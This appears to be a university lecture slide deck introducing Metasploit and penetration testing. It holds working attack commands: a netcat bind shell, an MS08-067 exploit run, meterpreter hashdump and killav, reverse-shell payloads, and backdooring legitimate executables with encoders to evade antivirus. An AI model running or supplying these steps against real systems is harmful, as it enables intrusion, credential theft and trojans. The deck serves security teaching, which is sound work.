metasploit: pwnage and ponies

The Metasploit Framework Vast collection of exploits, payloads and encoders. Modules for vulnerability scanning and information gathering. Modules for exploitation and session management. Modules for post exploitation, pivoting and getting all up in ur base.

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Post on 22-Nov-2014




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Introduction to metasploit that we presented to the 4th year compsci students at Rhodes university.Covering the basic functionality of metasploit, and penetration testing. The practical section that Etienne made (with Ponies) will come soon.


Page 1: Metasploit: Pwnage and Ponies

The Metasploit Framework

● Vast collection of exploits, payloads and encoders.

● Modules for vulnerability scanning and information gathering.

● Modules for exploitation and session management.

● Modules for post exploitation, pivoting and getting all up in ur base.

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BasicsExploits and PayloadsBy exploiting part of a system you interact with it in a manner not anticipated by the developers with the end goal of getting your own code(payload)/logic to execute. Pentesting == Legal Le Hacking

● PTES● Watered down process

○ Information Gathering■ port scans, service enumeration, mapping the attack vector.■ Testing payloads against AV, making sure everything is ready.

○ Exploitation■ Attacking hosts.■ Compromise from any angle.

○ Post Exploitation■ Pivot -> back to information gathering -> Exploitation

● This time should be faster● Password re-use● Passwords to crack● pass the hash/token● You might already have DA, so just go and find what you're after.

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Different kinds of Pentest

● Web Applications○ See OWASP○ SQLi, XSS, Csrf, directory traversal, broken authentication, session

management, access controls, reflected attacks, breaking application logic, client side attacks, information disclosure

● Footprint○ What hosts/services are visible to public networks, information

disclosure, forgotten hosts, incorrectly configured hardware.

● Infrastructure○ Attacking hosts on a network, often internal to an organization or hosts

found during the footprint.○ Targeting hosts - OS and services (out dated/unpatched), weak

password, incorrectly configured applications, zero days.○ Targeting infrastructure - Routers and switches, IDS/IPS capabilities

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nmap primer● nmap is a port scanner and OS/service fingerprinting tool.● It has become even more, welcome the NSE

○ Vuln checking and much more. Basic Scanning:nmap -sS -p80nmap -sS -O -A -oX - In msfconsole (once you have a database connected)msf > db_connect <username>:<password>@ that you are connected by using:msf > db_status db_nmap <options>

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Interacting with MetasploitmsfconsoleMost used, feature rich, well supported. This is where the magic happens, make sure you run it as root.root@bt5:/# msfconsolemsf >

msfcliFocused towards scripting and interaction with other command line tools. Sexy one liners.

armitageThe metasploit GUI, nice for fuzzing but lets stick to msfconsole.

Some of the other components you might use:msfpayload, msfencode, msfvenom

Other bits of awesome:karmasploit, SET, Wmap

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Metasploit DBFirst create a user and databaseroot@bt5:/# su postgrespostgres@bt5:/# createuser foobar -PEnter password for new role:Enter it again:Shall the new role be a superuser? (y/n) nShall the new role be allowed to create databases? (y/n) nShall the new role be allowed to create more new roles? (y/n) npostgres@bt5:/# createdb --owner=foobar foo_db Then in msfconsole conenct to the databasemsf > db_connect foobar:<password>@ From now on you can work with the database in msfconsole, db_nmap will save nmap results to the database automaticly

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Basic Commands

● use <module>○ info○ show options○ set <option> <value>

● show ○ payloads○ exploits○ auxiliary○ options

● search○ string that will make your day, "show vnc"

● back

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Brute Force AttacksLets do a brute force dictionary attack on mysql server(s)First step is to find hosts running mysqlnmap -sV -p3306 --open <IP Range> If that returns some hosts, you can target a specific one or if your lazy,skip the nmap scan and do it directly with the metasploit mysql login scannermsf > use auxiliary/scanner/mysql/mysql_loginmsf > set USERPASS /home/me/short.txtmsf > set RHOSTS <IP || Range>msf > exploit

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ShellzA shell is software that interacts between a user and the kernel, it provides an interface for interacting with the kernel.

Bind ShellA bind shell "binds" a interactive shell to a port on the victims host, thus allowing the attacker (or anyone for that matter) to connect to it. A simple example using netcat; nc.exe -lvp 4444 -e cmd.exe

Reverse ShellCreates a shell from the target host to the attackers host. Consider your target is sitting behind a NAT, this would stop you in your tracks if you tried to create a bind shell (unless you had already compromised their router and setup port forwarding). So if your target does not have a publicly accessible IP (but you do) use a reverse shell. NAT lolwut

Meterpreter ShellThe meta interpreter is a payload that provides complex and advanced functionality, all functions loaded and executed by meterpreter are done so in memory. Think of it as a meta shell with a ton of built in features that will save you a lot of time and effort. Some useful meterpreter commands are covered later, use the following for navigating sessions.meterpreter > backgroundmsf > sessionsmsf > sessions -i <session #>

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The Art of ExploitationInformation Gatheringmsf > db_nmap -sS -O -A Now lets check for MS08-067 since its running XP < sp 3msf > db_nmap --script smb-check-vulns.nse -p445 > vulns

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The Art of ExploitationConfirming vulnerability, ready exploit msf > vulns showed us that the host was indeed vulnerable[*] Time: 2012-03-21 19:56:10 UTC Vuln: host= port=445 proto=tcp name=MS08-067 refs=CVE-2008-4250,BID-31874,OSVDB-49243,CWE-94,MSFT-MS08-067,MSF-Microsoft Server Service Relative Path Stack Corruption,NSS-34476

Time to use our first exploit, first search for it:msf > search ms08-067 Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption

Time to load the exploit:msf > use exploit/windows/smb/ms08_067_netapi

Use show options || payloads to see the configuration options available.msf exploit(ms08_067_netapi) > show optionsmsf exploit(ms08_067_netapi) > show payloads

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The Art of ExploitationConfigure the exploitmsf exploit(ms08_067_netapi) > set RHOST => msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcpPAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > show options Everything looks good, now run the exploit

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The Art of Post ExploitationMeterpreter commands of interest:meterpreter > hashdumpmeterpreter > shell Current user, working directory and process IDmeterpreter > getuidmeterpreter > pwdmeterpreter > getpid Now you can migrate to a more reliable process, although not really necessary in this casemeterpreter > psmeterpreter > migrate <pid> Some funmeterpreter > screenshotmeterpreter > run vncmeterpreter > run killav

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MSFpayloadUsed to create payloads on their own, sharing is caring.msfpayload linux/x64/shell_reverse_tcp LHOST= LPORT=4444 x > funkytown.exe

Stealthy ninja, hidden ginger. Launch payload while continuing normal execution. -k tells payload to launch in a separate thread (does not work with all executables, test, test, test)root@bt:/# msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x putty.exe -o var/www/putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5

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● You have a payload

● The user will execute it (or you might) How do you handle the connection?

● Welcome to the multi-handler.

root@bt:/# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST= LPORT=6666 E[*] Please wait while we load the module tree...[*] Started reverse handler on[*] Starting the payload handler...[*] Command shell session 1 opened ( -> C:\Documents and Settings\Administrator\My Documents\Pron Downloads> :)

Make sure the payload matches the one you created with msfpayload

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MSFencode● Anti-Virus Evasion● IDS Evasion● Taking care of bad characters in your shellcode

○ x00 and xff

Show list of encoders:msfencode -l when in doubt, use x86/shikata_ga_nai a Polymorphic XOR Additive Feedback Encoder, the only encoder that has been rated Excellent. You can have multiple encoding runs:msfpayload windows/meterpreter/reverse_tcp LPORT=12345 R |msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw |... Keep on Shuffling ... |msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/jouma.exe

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Hiding in plain sightCustom Executable Templates

● msfpayload embeds payload into a default executable template (data/templates/template.exe)

● While this template does change from time to time, AV companies check it.

● You can however use any windows executable in place of the default.

○ Use the -x option msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x custom/notepad.exe -o /var/www/ponies/inurbase.exe -e x86/shikata_ga_nai -c 5

PackersTool that compresses an executable and combines it with decompression code. root@bt:/# upx -5 /var/www/payload.exe

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Don't be stupidPwnage is awesome

● getting shellz rock.

● realising you have remote code execution in a service is better than coke.

● Dumping hashes and cracking them makes you laugh. Getting caught is kak

● and you will get caught *cough* Sabu *cough* if you mess with systems without authorization.

● Having Bubba as a cellmate WILL be uncomfortable.

● No one likes a show off.

● Getting kicked out of university is counter productive and ill advised.

● So...


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Don't be stupidBubba loves ponies, you don't want to be a pony...